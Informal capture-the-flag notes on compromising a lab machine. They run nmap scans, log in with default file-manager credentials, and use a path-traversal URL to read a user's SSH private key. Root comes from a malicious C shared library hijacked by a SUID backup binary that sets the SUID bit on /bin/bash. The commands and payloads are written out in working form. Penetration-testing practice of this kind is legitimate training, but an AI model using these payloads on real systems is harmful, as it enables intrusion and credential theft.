Enum
sudo nmap -T4 -A -v -o nmap --min-rate 1000 $IP
sudo nmap -T4 --script=vuln -v -o vuln --min-rate 1000 $IP
sudo nmap -T4 -A -v -p- -o alltcp --min-rate 1000 $IP
sudo nmap -A -v -p- -o alltcpslow $IP
echo "-----------------------------------------------------"
echo "TCP is done, startng udp (slowwwwww)
echo "-----------------------------------------------------"
sudo nmap -T4 -sU -A -vv -p- -o udp --min-rate 1000 $IP
Services:
Discovered open port 22/tcp on 192.168.211.43
Discovered open port 80/tcp on 192.168.211.43
80
php file manager
default creds worked
fm_admin:fm_admin
User discovered
brian
lets test this
nah
lets test this
nah
?p=
url parameter looks like we can mess wit it
We can get anywhere with
Try this on any weird lookin dir
http://192.168.211.43/index.php?p=../../../../
We can grab keys for brain
http://192.168.211.43/index.php?p=..%2F..%2F..%2F..%2F%2Fhome%2Fbrian%2F.ssh
http://192.168.211.43/index.php?p=..%2F..%2F..%2F..%2F%2Fhome%2Fbrian%2F.ssh&view=id_rsa
ssh to john on that key
eugene (brian_key)
local
95b098a3954f7249706164e07e198a32
priv esc
suid bin “backup”
/opt/backup
brian@backupbuddy:/opt$ ./backup
Starting backup ...
Aborting. Backup Error!
Lets watch it
well that didn’t help
ah but its running sometimes
eh
RUN STRINGS ON BINS YOU DONT KNOW
Starting backup ...
/home/brian/.config/libm.so
Aborting. Backup Error!
Backup successful!
Its loading a library !
folder doesn’t exist
Lets make our own library
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("sudo chmod +s /bin/bash");
}
gcc -fPIC -shared -o libm.so t.c -nostartfiles
WORKED LETS GOOOOO
bash -p
thats root
proof.txt
75492d89c149df5216bcf155861a0bab